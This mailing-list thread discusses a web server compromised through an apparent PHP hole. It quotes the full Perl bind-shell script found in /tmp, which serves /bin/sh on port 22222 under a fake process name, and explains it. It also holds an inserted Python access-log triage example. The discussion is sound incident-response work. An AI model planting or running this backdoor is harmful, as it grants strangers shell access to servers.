Barbara M. wrote:
> On Tue, 15 Nov 2005, Vidar Tyldum Hansen wrote:
>
>>> A friend who has an httpd server based on TSL 2.2 has received this
>>> mail:
>>>
>>> -------------------------------------------
>>> Subject: Your_host_have_been_attacked
>>>
>>> Your host have been attacked by pv script. Look on netstat -anp for
>>> process listen on 4123 port
>>>
>>> -------------------------------------------
>>>
>>>
>>> He tells me that there is a process listening on port 4123 and another on
>>> 22222. Stopping httpd and killing the process that owns the daemons seems
>>> to temporarily "solve" the problem.
>>> He said that the processes are owned by httpd.
>>> He is now busy rebuilding a new box to migrate the data to, so he asked
>>> me to collect info on the "pv script".
>>> Any hints?
>> Name of process? Where does it live on the filesystem?
>
> I haven't seen the server; he tells me that the process is named "perl"
> and he found a perl script in /tmp
>
>> What does a 'strings filename' reveal?
>
> Can you explain this?
If it was a binary file and not a script you could have gotten some
valuable info using the program strings.
Try 'strings <filename>' on a binary file. Some phrases could lead you
further or at least give you something to google by.
>> Go through the access-logs for apache. My guess is that there was a
>> badly written PHP app on it and that led to remote execution
>> vulnerabilities.
>
> Suggested;
> Reply: "Yes, but parsing some GB of logs without an idea of what exactly
> to search for ..."
Usually there is an exceptionally long logline or you find the name of
the running process in a GET string. I would grep for "pv2" and/or "/tmp".
>> The fact that all the parasites ran as httpd and not root points very
>> hard in that direction.
>
> This is what my friend has found in /tmp:
>
>
> ---------pv2------------------------
> #!/usr/bin/perl
> use Socket;
> $port=22222;
> $proto=getprotobyname('tcp');
> $cmd="lpd";
> $system='/bin/sh';
> $0=$cmd;
> socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket:$!";
> setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die
> "setsockopt: $!";
> bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
> listen(SERVER, SOMAXCONN) or die "listen: $!";
> for(;$paddr=accept(CLIENT, SERVER);close CLIENT) {
> open(STDIN, ">&CLIENT");
> open(STDOUT, ">&CLIENT");
> open(STDERR, ">&CLIENT");
> system($system);
> close(STDIN);
> close(STDOUT);
> close(STDERR);
> }
>
> ------------------------------------
>
> If anyone can translate for people that don't "speak" enough perl to
> fully understand ... ;-)
It basically leaves /bin/sh listening for commands via port 22222, AKA the
world logged in as 'httpd'. Used either to install further services or
to try to elevate privileges to root.
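The access-log triage suggested earlier in this thread (look for the script name, for "/tmp", and for exceptionally long request lines), written out as an added Python example that is not part of the original thread. The combined-log regex, the length threshold, the pattern list and the sample log lines are all assumptions constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Strings named in the thread: the dropped script and the directory it lived in.
SUSPECT_PATTERNS = ("pv2", "/tmp")
# Request lines longer than this are flagged as "exceptionally long" (assumed threshold).
MAX_REQUEST_LEN = 300


def scan_access_log(lines, patterns=SUSPECT_PATTERNS, max_len=MAX_REQUEST_LEN):
    """Return a list of (line_no, reasons, host, request) for entries worth a look."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            # Lines that do not parse are reported too; a tampered log is itself a finding.
            findings.append((n, "unparseable", "", line.rstrip()[:80]))
            continue
        request = m.group("request")
        decoded = unquote(request)  # percent-decode so "%2Ftmp" matches "/tmp" as well
        reasons = []
        if len(request) > max_len:
            reasons.append("long-request")
        reasons += ["pattern:" + p for p in patterns if p in decoded]
        if reasons:
            findings.append((n, ",".join(reasons), m.group("host"), decoded[:120]))
    return findings


# Constructed sample lines (not from the thread): one benign request, one that
# names the script in /tmp in its query string, and one oversized request line.
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Nov/2005:10:01:02 +0100] "GET /index.php HTTP/1.1" 200 4523 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [15/Nov/2005:10:05:44 +0100] "GET /page.php?f=%2Ftmp%2Fpv2 HTTP/1.1" 200 12 "-" "curl"',
    '203.0.113.9 - - [15/Nov/2005:10:06:01 +0100] "GET /?q=' + "A" * 400 + ' HTTP/1.1" 414 0 "-" "-"',
]

if __name__ == "__main__":
    for n, reasons, host, req in scan_access_log(SAMPLE_LOG):
        print(f"line {n}: {reasons} from {host}: {req}")
```

On a real box, feed it the file with `scan_access_log(open("/var/log/httpd/access_log"))` and widen the pattern list with whatever `strings` or `ps` turned up.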
_______________________________________________
tsl-discuss mailing list
[email protected]
http://lists.trustix.org/mailman/listinfo/tsl-discuss